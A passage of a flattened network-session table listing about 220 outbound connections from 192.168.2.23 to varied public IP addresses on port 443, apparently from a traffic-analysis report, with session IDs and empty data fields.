                                                11297192.168.2.2345216163.201.218.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11298192.168.2.234522874.80.44.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11299192.168.2.2342682160.129.38.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11300192.168.2.2334208145.60.201.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11301192.168.2.2333112148.14.203.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11302192.168.2.2352268103.49.90.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11303192.168.2.233929281.246.69.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11304192.168.2.2350492211.166.22.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11305192.168.2.235111085.53.167.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11306192.168.2.2339826187.253.211.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11307192.168.2.2334726179.215.247.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11308192.168.2.2346170206.194.98.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11309192.168.2.234788677.39.105.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11310192.168.2.2346470150.32.10.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11311192.168.2.236012852.24.81.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11312192.168.2.2357268201.175.191.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11313192.168.2.235766888.249.243.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11314192.168.2.2346544139.4.80.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11315192.168.2.233906248.95.220.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11316192.168.2.2348616197.155.188.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11317192.168.2.2358980177.237.248.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11318192.168.2.2355716209.136.248.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11319192.168.2.2352702197.98.107.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11320192.168.2.235372847.47.2.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11321192.168.2.235372824.104.123.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11322192.168.2.234620695.124.32.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11323192.168.2.234478472.252.252.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11324192.168.2.2350478143.152.101.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11325192.168.2.2352352206.75.215.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11326192.168.2.235824631.188.187.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11327192.168.2.2342534154.147.146.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11328192.168.2.2351294196.53.172.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11329192.168.2.233513250.133.104.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11330192.168.2.2352736173.115.131.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11331192.168.2.235066052.181.93.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11332192.168.2.2349884177.131.132.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11333192.168.2.235811477.233.217.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11334192.168.2.233647627.66.28.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11335192.168.2.234122232.121.87.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11336192.168.2.2348632137.140.121.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11337192.168.2.2357834162.159.52.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11338192.168.2.233939496.17.186.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11339192.168.2.234605684.241.47.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11340192.168.2.235908276.253.125.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11341192.168.2.2355110147.69.64.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11342192.168.2.233575860.207.244.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11343192.168.2.2345860169.109.181.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11344192.168.2.234088082.62.56.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11345192.168.2.2359658217.200.83.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11346192.168.2.234572619.99.188.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11347192.168.2.2347656157.14.127.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11348192.168.2.2343860135.164.219.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11349192.168.2.235866459.39.76.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11350192.168.2.235184232.108.32.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11351192.168.2.234165438.79.180.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11352192.168.2.2357742196.150.187.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11353192.168.2.2350684216.110.248.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11354192.168.2.235052866.82.1.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11355192.168.2.235626854.20.3.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11356192.168.2.234264088.26.201.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11357192.168.2.2336916199.33.139.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11358192.168.2.2339464171.3.178.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11359192.168.2.234415071.71.23.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11360192.168.2.2335632174.188.192.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11361192.168.2.2348514204.184.163.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11362192.168.2.2347148118.150.135.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11363192.168.2.2354732138.7.134.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11364192.168.2.2345972131.41.71.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11365192.168.2.233738458.212.252.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11366192.168.2.235313881.146.156.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11367192.168.2.234680457.10.63.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11368192.168.2.2333964120.179.228.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11369192.168.2.2334098129.25.0.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11370192.168.2.235223253.105.153.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11371192.168.2.235047013.145.215.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11372192.168.2.2357460207.35.84.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11373192.168.2.2336682174.236.19.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11374192.168.2.234803665.13.78.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11375192.168.2.2351244202.217.101.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11376192.168.2.235451497.144.53.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11377192.168.2.235469431.151.95.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11378192.168.2.234363248.46.70.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11379192.168.2.2357210150.216.222.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11380192.168.2.234649462.37.144.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11381192.168.2.23409424.63.83.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11382192.168.2.2353730207.235.242.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11383192.168.2.2342934220.88.92.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11384192.168.2.233800044.225.106.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11385192.168.2.234790047.129.111.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11386192.168.2.2358918179.156.61.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11387192.168.2.23461401.163.240.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11388192.168.2.235887079.89.16.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11389192.168.2.2351684211.206.25.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11390192.168.2.234630245.37.74.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11391192.168.2.2350646202.211.182.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11392192.168.2.2348012120.230.104.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11393192.168.2.235282834.105.44.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11394192.168.2.2353474145.254.101.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11395192.168.2.2350690205.232.39.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11396192.168.2.2335942153.40.166.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11397192.168.2.2358284162.140.185.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11398192.168.2.234490699.108.198.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11399192.168.2.2360982136.206.129.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11400192.168.2.2345510172.64.227.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11401192.168.2.235172083.133.118.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11402192.168.2.2342248129.225.71.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11403192.168.2.2336514116.98.79.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11404192.168.2.2360232108.240.235.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11405192.168.2.2358414194.197.145.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11406192.168.2.235165443.153.220.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11407192.168.2.236021080.180.7.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11408192.168.2.234861231.87.122.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11409192.168.2.235567087.102.111.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11410192.168.2.234099445.58.100.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11411192.168.2.234279818.228.181.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11412192.168.2.233409450.171.121.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11413192.168.2.2356966113.230.252.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11414192.168.2.2344388219.92.12.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11415192.168.2.233833419.166.141.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11416192.168.2.234544643.161.12.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11417192.168.2.233304842.184.95.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11418192.168.2.23332381.13.254.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11419192.168.2.2356848157.238.12.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11420192.168.2.2333852199.133.227.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11421192.168.2.2348026174.208.69.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11422192.168.2.234369812.154.166.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11423192.168.2.2343182156.88.89.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11424192.168.2.2339168204.63.14.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11425192.168.2.234950820.208.161.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11426192.168.2.236089417.127.115.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11427192.168.2.2342552167.7.137.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11428192.168.2.2346330139.205.170.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11429192.168.2.2349606207.204.231.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11430192.168.2.233983866.44.155.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11431192.168.2.2345046206.168.30.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11432192.168.2.2345818100.214.35.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11433192.168.2.2359240147.208.110.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11434192.168.2.234096253.53.16.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11435192.168.2.2335624128.175.99.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11436192.168.2.233734218.48.67.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11437192.168.2.2357784172.122.194.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11438192.168.2.2342900116.217.24.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11439192.168.2.2349214210.254.157.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11440192.168.2.236041827.113.129.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11441192.168.2.2356686187.249.91.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11442192.168.2.234059261.144.254.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11443192.168.2.2353754101.225.53.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11444192.168.2.234345431.6.244.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11445192.168.2.235848889.79.246.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11446192.168.2.2334512167.30.124.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11447192.168.2.2359444148.114.247.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11448192.168.2.2355244200.238.63.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11449192.168.2.2359192122.68.55.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11450192.168.2.23500465.122.115.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11451192.168.2.235582296.65.78.181443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11452192.168.2.2348980205.223.198.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11453192.168.2.234771261.78.52.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11454192.168.2.235855014.137.204.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11455192.168.2.2359770166.188.230.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11456192.168.2.2340534162.43.170.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11457192.168.2.2335852152.102.47.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11458192.168.2.2340796208.131.47.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11459192.168.2.2345724154.86.164.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11460192.168.2.2350514178.74.180.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11461192.168.2.235964093.76.217.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11462192.168.2.2359690189.69.228.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11463192.168.2.2346776112.98.4.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11464192.168.2.2354194149.27.204.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11465192.168.2.23334065.251.97.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11466192.168.2.2343220170.181.218.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11467192.168.2.2334366183.186.26.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11468192.168.2.235129612.11.150.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11469192.168.2.2339538156.51.215.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11470192.168.2.234407071.221.239.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11471192.168.2.235746660.121.117.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11472192.168.2.233857893.46.4.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11473192.168.2.2360070199.42.65.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11474192.168.2.234425053.87.1.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11475192.168.2.23537881.91.134.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11476192.168.2.234792223.200.235.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11477192.168.2.2341296169.139.80.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11478192.168.2.2342324201.19.84.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11479192.168.2.234773819.190.180.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11480192.168.2.23464569.15.28.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11481192.168.2.2339808163.155.9.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11482192.168.2.23544129.95.169.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11483192.168.2.2335588220.110.207.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11484192.168.2.234994077.170.3.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11485192.168.2.233545298.149.25.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11486192.168.2.235982691.198.202.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11487192.168.2.2342230118.83.138.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11488192.168.2.2350806159.178.48.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11489192.168.2.2344318180.25.23.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11490192.168.2.2339632146.215.120.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11491192.168.2.23394322.62.174.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11492192.168.2.2357968139.226.102.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11493192.168.2.2333560197.54.22.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11494192.168.2.2337182153.246.15.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11495192.168.2.2348120194.48.149.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11496192.168.2.2348972180.98.3.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11497192.168.2.235042438.201.219.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11498192.168.2.2341368147.2.87.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11499192.168.2.2334390139.235.102.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11500192.168.2.234841897.122.32.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11501192.168.2.2346244186.89.248.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11502192.168.2.235334070.16.181.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11503192.168.2.2352808169.4.249.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11504192.168.2.2346902108.181.233.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11505192.168.2.235688243.134.215.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11506192.168.2.233667884.14.50.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11507192.168.2.2357714131.14.69.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11508192.168.2.234621837.59.16.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11509192.168.2.235089888.148.63.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11510192.168.2.2333770201.86.98.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11511192.168.2.235448480.91.1.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11512192.168.2.233604466.22.180.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11513192.168.2.235097458.242.6.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11514192.168.2.2360572140.69.57.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11515192.168.2.2353050142.168.245.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11516192.168.2.233387645.131.101.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11517192.168.2.235659470.182.100.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                11518192.168.2.234669843.250.93.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
